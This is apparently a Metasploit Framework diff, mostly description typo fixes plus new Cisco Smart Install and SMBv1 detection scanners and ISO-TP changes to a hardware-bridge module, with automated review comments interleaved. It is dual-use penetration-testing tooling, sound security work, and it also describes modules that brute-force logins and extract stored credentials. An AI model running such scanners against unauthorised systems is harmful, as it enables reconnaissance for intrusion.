6ed5135a1e..19fb15100f 100644 
--- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Page Scraper', - 'Description' => 'Scrap defined data from a specific web page based on a regular expresion', + 'Description' => 'Scrape defined data from a specific web page based on a regular expression', 'Author' => ['et'], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 2b7f08b7c2..be547ebc00 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary A misconfigured Squid proxy can allow an attacker to make requests on his behalf. This may give the attacker information about devices that he cannot reach but the Squid proxy can. For example, an attacker can make requests for internal IP addresses - against a misconfigurated open Squid proxy exposed to the Internet, therefore performing + against a misconfigured open Squid proxy exposed to the Internet, therefore performing an internal port scan. The error messages returned by the proxy are used to determine if the port is open or not. diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index b8b9f3e173..67950be71b 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Squiz Matrix User Enumeration Scanner', 'Description' => %q{ - This module attempts to enumernate remote users that exist within + This module attempts to enumerate remote users that exist within the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs e.g. ?a=14 and searching for a valid username eg "~root" or "~test" which is prefixed by a "~" in the response. It will also try to GET the users diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb b/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb index 8642aab17e..e3c8e942ed 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability', 'Description' => %q{ - This module will grab the AD account saved in Symantec Messaging Gateway and then + This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed Symantec PBE key. Note that authentication is required in order to successfully grab the LDAP credentials, and you need at least a read account. Version 10.6.0-7 and earlier are affected diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index d4730f45b2..33fcc2e00e 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of - Nozvell Zenworks Asset Managmment, including the database credentials in clear text. + Novell Zenworks Asset Managment, including the database credentials in clear text. This module has been successfully tested on Novell ZENworks Asset Management 7.5. }, 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/misc/cisco_smart_install.rb b/modules/auxiliary/scanner/misc/cisco_smart_install.rb new file mode 100644 index 0000000000..e8ab34009b --- /dev/null +++ b/modules/auxiliary/scanner/misc/cisco_smart_install.rb 
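Review bot: The corrected zenworks description line still misspells the product: `Managmment` became `Managment`, and `Zenworks` differs from the `ZENworks` used on the surrounding lines of the same description. `Novell ZENworks Asset Management, including the database credentials in clear text.` matches both the product name and the neighbouring lines.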
@@ -0,0 +1,88 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Identify Cisco Smart Install endpoints',
+ 'Description' => %q(
+ This module attempts to connect to the specified Cisco Smart Install port
+ and determines if it speaks the Smart Install Protocol. Exposure of SMI
+ to untrusted networks can allow complete compromise of the switch.
+ ),
+ 'Author' => 'Jon Hart ',
+ 'References' =>
+ [
+ ['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],
+ ['URL', 'https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature'],
+ ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi'],
+ ['URL', 'https://github.com/Cisco-Talos/smi_check'],
+ ['URL', 'https://github.com/Sab0tag3d/SIET']
+
+ ],
+ 'License' => MSF_LICENSE
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(4786)
+ ]
+ )
+ end
+
+ # thanks to https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
+ SMI_PROBE = "\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00".freeze
+ SMI_RE = /^\x00{3}\x04\x00{7}\x03\x00{3}\x08\x00{3}\x01\x00{4}$/
+ def smi?
+ sock.puts(SMI_PROBE)
+ response = sock.get_once(-1)
+ if response
+ if SMI_RE.match?(response)
+ print_good("Fingerprinted the Cisco Smart Install protocol")
+ return true
+ else
+ vprint_status("No match for '#{response}'")
+ end
+ else
+ vprint_status("No response")
+ end
+ end
+
+ def run_host(_ip)
+ begin
+ connect
+ return unless smi? 
+ rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \ + ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e + vprint_error("error while connecting and negotiating Cisco Smart Install: #{e}") + return + ensure + disconnect + end + + service = report_service( + host: rhost, + port: rport, + proto: 'tcp', + name: 'Smart Install' + ) + + report_vuln( + host: rhost, + service: service, + name: name, + info: "Fingerprinted the Cisco Smart Install Protocol", + refs: references, + exploited_at: Time.now.utc + ) + end +end diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index cfa74bfb5b..eb749caced 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. - The protocol deisgn issue also allows attackers to reset passwords on the device. + The protocol design issue also allows attackers to reset passwords on the device. }, 'Author' => 'Ben Schmidt', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index b5d60ac0a8..22d31ab354 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb 
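Review bot: `sock.puts(SMI_PROBE)` in smi? appends a newline to the 24-byte probe, so 25 bytes go on the wire; `sock.put(SMI_PROBE)` sends the probe exactly as defined, which is also what the smb1 module added in this commit does. SMI_RE anchors with `^` and `$`, which match at line boundaries inside the binary reply, so a response that happens to contain a newline can match on a substring; `\A` and `\z` anchor the whole buffer. `Regexp#match?` only exists from Ruby 2.4, so if older interpreters are still in the support matrix, `SMI_RE =~ response` is the portable spelling. `vprint_status("No match for '#{response}'")` writes the raw server bytes to the console; `response.inspect` keeps control characters from reaching the terminal. The run_host method started in the previous diff line and continues here.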
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %Q{ This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such - as master,model,msdb, and tempdb. The module will create + as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading. }, diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index 664e90f57e..6d103377aa 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -13,23 +13,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'Nessus NTP Login Utility', - 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(1241), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'Nessus NTP Login Utility', + 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(1241), + OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users") + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index e54d611a98..9d8a4532b6 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb 
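Review bot: The rewritten nessus_ntp_login register_options passes a bare String as the second argument in `OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")`, while the parallel rewrites of openvas_omp_login and openvas_otp_login in this commit keep the `[false, "Try blank passwords for all users", false]` attribute array; unless the option base class accepts a String there, this one loses its explicit default, and either way the three sibling modules should use the same form. Dropping the advanced `SSL`/`SSLVersion` options also removes the module-level default of SSL=true; if the Tcp mixin's own SSL option defaults to false and nothing else in the module sets it, the scanner now connects in plaintext to a service the old default treated as TLS-only, which is worth confirming before merge. The same observation applies to the two openvas hunks that follow.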
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'OpenVAS gsad Web Interface Login Utility', 'Description' => %q{ - This module simply attempts to login to a OpenVAS gsad interface + This module simply attempts to login to an OpenVAS gsad interface using a specific user/pass. }, 'Author' => [ 'Vlatko Kosturjak ' ], diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index 5bf19b584c..86da3f4c9f 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OMP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9390), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OMP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9390), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index 26a8ce7937..52941770b7 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb 
@@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OTP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9391), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OTP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9391), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index a866ab040e..14f68f1681 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Oracle Enterprise Manager Control SID Discovery', 'Description' => %q{ - This module makes a request to the Oracle Enterprise Manager Control Console + This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID. }, 'References' => diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a10678f482..1643a4f801 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle TNS Listener SID Bruteforce', 'Description' => %q{ - This module queries the TNS listner for a valid Oracle database + This module queries the TNS listener for a valid Oracle database instance name (also known as a SID). Any response other than a "reject" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index d5ad4c69f3..b41958aa87 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle TNS Listener SID Enumeration', 'Description' => %q{ - This module simply queries the TNS listner for the Oracle SID. + This module simply queries the TNS listener for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed. }, diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 0efe4491ea..905a355a71 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module checks the server for vulnerabilities like TNS Poison. Module sends a server a packet with command to register new TNS Listener and checks for a response indicating an error. If the registration is errored, the target is not - vulnearble. Otherwise, the target is vulnerable to malicious registrations. + vulnerable. Otherwise, the target is vulnerable to malicious registrations. }, 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => 
diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index a2b678b554..eaf2cdf50a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Oracle XML DB SID Discovery', 'Description' => %q{ - This module simply makes a authenticated request to retrieve + This module simply makes an authenticated request to retrieve the sid from the Oracle XML DB httpd server. }, 'References' => diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 9d987e5b17..20b95e7c14 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'PostgreSQL Version Probe', 'Description' => %q{ - Enumerates the verion of PostgreSQL servers. + Enumerates the version of PostgreSQL servers. }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 8af75c637c..96687a8ac5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'SAP Management Console getStartProfile', 'Description' => %q{ - This module simply attempts to acces the SAP startup profile + This module simply attempts to access the SAP startup profile through the SAP Management Console SOAP Interface. }, 'References' => diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index ffb1b27239..9643be880c 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb 
+++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -13,10 +13,10 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed - to IP, which is called ModbusTCP. default tcpport is 502. + to IP, which is called ModbusTCP. default tcp port is 502. This module sends a command (0x04, read input register) to the modbus endpoint. - If this command is sent to the correct unit-id, it returns with the same funcion-id. + If this command is sent to the correct unit-id, it returns with the same function-id. if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows which do not interest us. This does not always happen, but at least the first 4 bytes in the return-packet should be exact the same as what was sent. diff --git a/modules/auxiliary/scanner/smb/smb1.rb b/modules/auxiliary/scanner/smb/smb1.rb new file mode 100644 index 0000000000..0e52f9f879 --- /dev/null +++ b/modules/auxiliary/scanner/smb/smb1.rb 
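Review bot: The corrected modbus_findunitid description line still starts a sentence in lowercase and keeps the abbreviation inconsistent with the rest of the paragraph: `to IP, which is called ModbusTCP. default tcp port is 502.`; `to IP, which is called ModbusTCP. The default TCP port is 502.` reads as the surrounding text does. The rest of the hunk is wording only.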
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ # Exploit mixins should go first
+ include Msf::Exploit::Remote::Tcp
+
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ # Aliases for common classes
+ SIMPLE = Rex::Proto::SMB::SimpleClient
+ XCEPT = Rex::Proto::SMB::Exceptions
+ CONST = Rex::Proto::SMB::Constants
+
+ def initialize
+ super(
+ 'Name' => 'SMBv1 Protocol Detection',
+ 'Description' => 'Detect systems that support the SMBv1 protocol',
+ 'Author' => 'Chance Johnson @loftwing',
+ 'License' => MSF_LICENSE
+ )
+
+ register_options([ Opt::RPORT(445) ])
+ end
+
+ # Modified from smb2 module by @hdm
+ # Fingerprint a single host
+ def run_host(ip)
+ begin
+ connect
+
+ # Only accept NT LM 0.12 dialect and WfW3.0
+ dialects = ['PC NETWORK PROGRAM 1.0',
+ 'LANMAN1.0',
+ 'Windows for Workgroups 3.1a',
+ 'LM1.2X002',
+ 'LANMAN2.1',
+ 'NT LM 0.12']
+ data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
+
+ pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
+ pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
+ pkt['Payload']['SMB'].v['Flags1'] = 0x08
+ pkt['Payload']['SMB'].v['Flags2'] = 0xc801
+ pkt['Payload'].v['Payload'] = data
+
+ pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
+ pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
+
+ sock.put(pkt.to_s)
+ res = sock.get_once
+ # expecting \xff instead of \xfe
+ if res && res.index("\xffSMB")
+ print_good("#{ip} supports SMBv1 dialect.")
+ report_note(
+ host: ip,
+ proto: 'tcp',
+ sname: 'smb1',
+ port: rport,
+ type: "supports SMB 1"
+ )
+ end
+ rescue ::Rex::ConnectionError
+ rescue EOFError
+ rescue Errno::ECONNRESET
+ rescue ::Exception => e
+ print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
+ ensure
+ disconnect
+ end
+ 
end +end diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index bbf6ebd487..f68bfba654 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'HP LaserJet Printer SNMP Enumeration', 'Description' => %q{ This module allows enumeration of files previously printed. - It provides details as filename, client, timestamp and username informations. + It provides details as filename, client, timestamp and username information. The default community used is "public". }, 'References' => diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 11686cd943..474caddd27 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary ) end - rescue ::Rex::ConnectionError + rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e + print_error("A network issue has occurred: #{e.message}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue Timeout::Error print_error("#{target_host}:#{rport} Timed out after #{to} seconds") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue ::Exception => e print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") ensure disconnect end diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index 43070c5ece..1300dc4816 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb 
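Review bot: `rescue ::Exception => e` in smb1.rb's run_host also catches Interrupt and SystemExit, so a Ctrl-C during a scan is logged as a host error instead of stopping the module; `rescue ::StandardError => e` keeps the same logging for the errors that matter. The three empty clauses above it (`rescue ::Rex::ConnectionError`, `rescue EOFError`, `rescue Errno::ECONNRESET`) drop the error silently; a `vprint_error("#{ip}: #{e.class}")` in each keeps the default output quiet while still explaining missing hosts under VERBOSE. The comment `# Only accept NT LM 0.12 dialect and WfW3.0` does not describe the six-entry dialects list under it; `# Offer the classic SMB1 dialects; an SMBv1 server answers with a \xffSMB header` states what the code does. SIMPLE, XCEPT and CONST are defined at the top of the class but never referenced in the file, since the body spells out Rex::Proto::SMB::Constants directly.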
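Review bot: The `elog` added under `rescue Timeout::Error` in telnet_encrypt_overflow.rb references `e`, but that clause does not bind the exception (the `=> e` is missing), so `e` is nil there and `e.message` raises NoMethodError from inside the handler, replacing the timeout report with a crash. Change the clause to `rescue Timeout::Error => e`. The enclosing method starts outside the hunk.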
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %Q{ This module uses supplied login credentials to connect to VMWare via the web interface. It then searches through the datastores looking for screenshots. - It will downlaod any screenshots it finds and save them as loot. + It will download any screenshots it finds and save them as loot. }, 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 2f5487baff..fc0a043bbe 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash - exploits, you can set this. Also note that the Exclude option will always be evaludated + exploits, you can set this. Also note that the Exclude option will always be evaluated after the Include option. The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn. diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 51955cb34c..f51b978acc 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or - a random filename can be assisnged). All data received from this source will automatically + a random filename can be assigned). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to '^EOL') is received. 
diff --git a/modules/auxiliary/server/local_hwbridge.rb b/modules/auxiliary/server/local_hwbridge.rb index 277f356b2e..ce12bfef1b 100644 --- a/modules/auxiliary/server/local_hwbridge.rb +++ b/modules/auxiliary/server/local_hwbridge.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report - HWBRIDGE_API_VERSION = "0.0.1" + HWBRIDGE_API_VERSION = "0.0.4" def initialize(info = {}) super(update_info(info, @@ -170,13 +170,24 @@ class MetasploitModule < Msf::Auxiliary # srcid = hex id of the sent packet # dstid = hex id of the return packets # data = string of hex bytes to send - # timeout = optional int to timeout on lack of response - # maxpkts = max number of packets to recieve - def isotp_send_and_wait(bus, srcid, dstid, data, timeout = 2000, maxpkts = 3) + # OPT = Options + # timeout = optional int to timeout on lack of response + # maxpkts = max number of packets to recieve + # padding = append bytes to end of packet (Doesn't increase reported ISO-TP size) + # fc = flow control, if true forces flow control packets + def isotp_send_and_wait(bus, srcid, dstid, data, opt = {}) result = {} result["Success"] = false srcid = srcid.to_i(16).to_s(16) dstid = dstid.to_i(16).to_s(16) + timeout = 2000 + maxpkts = 3 + flowcontrol = nil + padding = nil + timeout = opt['TIMEOUT'] if opt.key? 'TIMEOUT' + maxpkts = opt['MAXPKTS'] if opt.key? 'MAXPKTS' + padding = opt['PADDING'] if opt.key? 'PADDING' + flowcontrol = opt['FC'] if opt.key? 'FC' bytes = data.scan(/../) if bytes.size > 8 print_error("Data section currently has to be less than 8 bytes") @@ -185,6 +196,10 @@ class MetasploitModule < Msf::Auxiliary sz = "%02x" % bytes.size bytes = sz + bytes.join end + if padding && bytes.size < 16 # 16 == 8 bytes because of ascii size + padding = "%02x" % padding.to_i + bytes += ([ padding ] * (16 - bytes.size)).join + end # Should we ever require isotpsend for this? `which cansend` unless $?.success? 
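Review bot: The new header comment above isotp_send_and_wait documents the options as `timeout`, `maxpkts`, `padding` and `fc`, but the body reads them from the hash as the String keys 'TIMEOUT', 'MAXPKTS', 'PADDING' and 'FC', so a caller following the comment would have every option ignored; name the keys as used, e.g. `# opt = Hash with optional String keys 'TIMEOUT', 'MAXPKTS', 'PADDING', 'FC'`. The same block keeps the misspelling in `maxpkts = max number of packets to recieve` (receive). The method continues past the end of the hunk.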
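Review bot: `padding = "%02x" % padding.to_i` in the new padding block is not bounded to one byte: the isotpsend_and_wait handler hunk further down captures any decimal digit string with `&padding=(\d+)`, and a value above 255 formats to three or more hex digits, so the padded payload is no longer a whole number of bytes and cansend is handed a malformed frame. Mask or reject out-of-range values before formatting, e.g. `padding = "%02x" % (padding.to_i & 0xff)`, and say in the option comment that the pad byte is given in decimal. The method starts and ends outside this hunk.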
@@ -193,15 +208,43 @@ class MetasploitModule < Msf::Auxiliary end @can_interfaces.each do |can| if can == bus - candump(bus, dstid, timeout, maxpkts) - system("cansend #{bus} #{srcid}##{bytes}") - @packets_sent += 1 - @last_sent = Time.now.to_i - result["Success"] = true if $?.success? - result["Packets"] = [] - $candump_sniffer.join - unless @pkt_response.empty? - result = @pkt_response + if flowcontrol + candump(bus, dstid, timeout, 1) + system("cansend #{bus} #{srcid}##{bytes}") + @packets_sent += 1 + @last_sent = Time.now.to_i + result["Success"] = true if $?.success? + result["Packets"] = [] + $candump_sniffer.join + unless @pkt_response.empty? + result = @pkt_response + if result.key?("Packets") && result["Packets"].size > 0 && result["Packets"][0].key?("DATA") + if result["Packets"][0]["DATA"][0] == "10" + system("cansend #{bus} #{srcid}#3000000000000000") + candump(bus, dstid, timeout, maxpkts) + @packets_sent += 1 + @last_sent = Time.now.to_i + $candump_sniffer.join + unless @pkt_response.empty? + if @pkt_response.key?("Packets") && @pkt_response["Packets"].size > 0 + result["Packets"] += @pkt_response["Packets"] + end + end + end + end + end + + else + candump(bus, dstid, timeout, maxpkts) + system("cansend #{bus} #{srcid}##{bytes}") + @packets_sent += 1 + @last_sent = Time.now.to_i + result["Success"] = true if $?.success? + result["Packets"] = [] + $candump_sniffer.join + unless @pkt_response.empty? + result = @pkt_response + end end end end 
